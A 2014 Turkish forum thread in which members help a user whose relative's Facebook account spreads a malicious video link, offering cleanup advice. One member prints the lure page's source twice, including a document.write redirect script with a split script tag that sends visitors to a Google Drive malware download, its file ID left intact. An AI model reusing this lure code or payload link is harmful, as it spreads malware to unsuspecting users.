Bu Virüsten nasıl kurtuluruz ?

16-05-2014, 03:08:31

Arkadaşlar bir yakınıma virüs bulaşmış facebook adresinden herkese sürekli etiketleyip video gönderiyor şu şekil...

Madenci Yaşa kimdir bilmiyorum büyük ihtimal fake bir hesap o değil kuzenimin hesabında bu kişiyle ilgili sayfa yada beğenide yok bütün uygulamarınıda temizledim 1-2 tane okey oyunu hariç..

Resimde bulunan ve tıklayıncada virüs bulaşan linki virüstotal ile tarattım ve aşağıdaki sonuç çıktı..Bu konuda hakkında bilgi sahibi olanlar yardım ederse sevinirim ne yapmak zorundayız acaba bilgisayaramı birşey soktular ???

Virüstotal Link Sonucu

https://www.virustotal.com/tr/url/99...is/1400198516/

16-05-2014, 03:39:46

#2

Dogukan

Büyük ihtimal eklentidir. Ancak incelemediğim kesin temizleme yolu gösteremeyeceğim. Eğer chrome, yandex browser kullanıyorsanız firefox indirin ve firefox kullanın.

Ayrıca böyle bir konuyu alet ederek zararlı yazılımı yapan kimse yarın bütün kimliğini tespit edip ifşa edeceğim. Saat geç oldu, uygulamayı inceleyebilecek durumda değilim. Büyük ihtimal burada facebook beğeni satışı yapıyordur.

16-05-2014, 03:51:04

#3

Martin

Dogukan adlı üyeden alıntı: mesajı görüntüle

Büyük ihtimal eklentidir. Ancak incelemediğim kesin temizleme yolu gösteremeyeceğim. Eğer chrome, yandex browser kullanıyorsanız firefox indirin ve firefox kullanın.

Ayrıca böyle bir konuyu alet ederek zararlı yazılımı yapan kimse yarın bütün kimliğini tespit edip ifşa edeceğim. Saat geç oldu, uygulamayı inceleyebilecek durumda değilim. Büyük ihtimal burada facebook beğeni satışı yapıyordur.

Tüm uygulamarımı temizledim kişinin profilinden ve son zamanlarda eklediği arkadaşlar olsun, takip ettiği kişiler ve beğendiği sayfalarda dahi sorun yok..

En son google chrome sildim yükledim 3 saat gene kimse göndermedi ve tekrar göndermeye başladı..%90 bilgisayara virüs girdi sanırım o birşekil yapıyor benim aklıma başka birşey gelmedi..

16-05-2014, 08:48:48

#4

JustRulz

Kimlik doğrulama veya yönetimden onay bekliyor.

combofix dene
sonrasında comodo internet security indir full update et
tüm makinanı tarat
en sonunda passwordlerini değiştir.

16-05-2014, 09:26:15

#5

ComPuter_DoctoR

Başlat >> Çalıştır >> Regedit >> HKEY_LOCAL_MACHINE >> SOFTWARE >> Microsoft >> Windows >> CurrentVersion >> Run

buradan otomatik çalışan yabancı gelen bir .exe dosyası varmı bi bak hocam bilgisayara bulaşmış bir virüs ise burada görünür olması gerekiyor

16-05-2014, 19:04:36

#6

Martin

ComPuter_DoctoR adlı üyeden alıntı: mesajı görüntüle

Başlat >> Çalıştır >> Regedit >> HKEY_LOCAL_MACHINE >> SOFTWARE >> Microsoft >> Windows >> CurrentVersion >> Run

buradan otomatik çalışan yabancı gelen bir .exe dosyası varmı bi bak hocam bilgisayara bulaşmış bir virüs ise burada görünür olması gerekiyor

Şu an o bilgisayarda değilim hocam 1-2 saate teamwiver ile girip bakarım..

Lakin gelelim işin ilginç tarafı video resminde görünen kişi facebook hesabından engellenemiyor..

Üzgünüz! Engelleme sistemine aşırı yüklenildi.

Böyle bir hata çıkıyor karşımıza..Şu an hesabı ben kendi bilgisayarımda açtım bakalım kimseye video göndermezse demekki kişinin bilgisayarında virüs mevcut o zaman combofixi devreye sokacağım...

17-05-2014, 10:38:52

#7

abcgrup

Martin adlı üyeden alıntı: mesajı görüntüle

Şu an o bilgisayarda değilim hocam 1-2 saate teamwiver ile girip bakarım..

Lakin gelelim işin ilginç tarafı video resminde görünen kişi facebook hesabından engellenemiyor..

Üzgünüz! Engelleme sistemine aşırı yüklenildi.

Böyle bir hata çıkıyor karşımıza..Şu an hesabı ben kendi bilgisayarımda açtım bakalım kimseye video göndermezse demekki kişinin bilgisayarında virüs mevcut o zaman combofixi devreye sokacağım...

Verdiğin linkten kaynak koda baktım virüsü buradan çekiyor
Sakın tıklamayın. Nokta koydum zaten.
https://....drive.google.com/uc?id=0...C1XbFB2MDB6eVE

Virüsü buraya indiriyor C:\Users\k.adı\Downloads\xxx.tmp şeklinde

Kaynak kodu

<script>
function winatomYonlendirme(){
document.write('Video indirildi, aşağıya tıklayarak izleyebilirsiniz.<scr'+'ipt>setTimeout(function(){location.href="https://drive.google.com/uc?id=0BxiaGDUBRsBDVC1XbFB2MDB6eVE"},500)</scr'+'ipt>')
}
window.onload=winatomYonlendirme;
winatomYonlendirme();
</script>




<style id="jsbin-css">

</style>
<script>

</script>
<script src="http://static.jsbin.com/js/render/edit.js?3.13.24"></script>
<script>jsbinShowEdit({"static":"http://static.jsbin.com","root":"http://jsbin.com","csrf":"6zjGawWV30UoITaRUPaartqG"});</script>
<script>
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-1656750-34']);
_gaq.push(['_trackPageview']);

(function() {
  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga);
})();
</script>

17-05-2014, 12:40:43

#8

Martin

Combofix ile tarattım bilgisayarı ama net bağlantısını kestiği için neler sildi bilmiyorum çıkan log kaydınıda akraba silmiş..

Daha sonra yandex ve chrome sildim çünkü ikisininde uzantılar bölümüne girilmiyordu oraya birşeyler ayarlanmıştı sanırsam hatta sildim yükledim durum aynıydı...

En son comodo internet security yükledik tam tarama yaptım combofixden sonra oda 2 tehdit buldu temizledim ve en son mozilla firefox yükledik şimdilik kimseye birşeyler göndermiyor hesap artık..

Gerçekten illet bir virüs bunu yapanların Allah belasını versin diyorum birde ölmüş insanlar üzerinden bunları yürütüyorlar gram vicdan kalmamış..

Araştırdığınız ve bizi bilgilendirdiğiniz için teşekkür ederim..

abcgrup adlı üyeden alıntı: mesajı görüntüle

Verdiğin linkten kaynak koda baktım virüsü buradan çekiyor
Sakın tıklamayın. Nokta koydum zaten.
https://....drive.google.com/uc?id=0...C1XbFB2MDB6eVE

Virüsü buraya indiriyor C:\Users\k.adı\Downloads\xxx.tmp şeklinde

Kaynak kodu

<script>
function winatomYonlendirme(){
document.write('Video indirildi, aşağıya tıklayarak izleyebilirsiniz.<scr'+'ipt>setTimeout(function(){location.href="https://drive.google.com/uc?id=0BxiaGDUBRsBDVC1XbFB2MDB6eVE"},500)</scr'+'ipt>')
}
window.onload=winatomYonlendirme;
winatomYonlendirme();
</script>




<style id="jsbin-css">

</style>
<script>

</script>
<script src="http://static.jsbin.com/js/render/edit.js?3.13.24"></script>
<script>jsbinShowEdit({"static":"http://static.jsbin.com","root":"http://jsbin.com","csrf":"6zjGawWV30UoITaRUPaartqG"});</script>
<script>
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-1656750-34']);
_gaq.push(['_trackPageview']);

(function() {
  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga);
})();
</script>

17-05-2014, 14:26:55

#9

abcgrup

Martin adlı üyeden alıntı: mesajı görüntüle

Combofix ile tarattım bilgisayarı ama net bağlantısını kestiği için neler sildi bilmiyorum çıkan log kaydınıda akraba silmiş..

Daha sonra yandex ve chrome sildim çünkü ikisininde uzantılar bölümüne girilmiyordu oraya birşeyler ayarlanmıştı sanırsam hatta sildim yükledim durum aynıydı...

En son comodo internet security yükledik tam tarama yaptım combofixden sonra oda 2 tehdit buldu temizledim ve en son mozilla firefox yükledik şimdilik kimseye birşeyler göndermiyor hesap artık..

Gerçekten illet bir virüs bunu yapanların Allah belasını versin diyorum birde ölmüş insanlar üzerinden bunları yürütüyorlar gram vicdan kalmamış..

Araştırdığınız ve bizi bilgilendirdiğiniz için teşekkür ederim..

Avast yüklerseniz engeller virüs girmeden. Birde malware programı yükleyin. Yinede en kısa sürede format çekmenizi öneririm sorunu gidermeniz kafi gelmeyebilir, virüsün nerelere bulaştığını bilmek mümkün değil.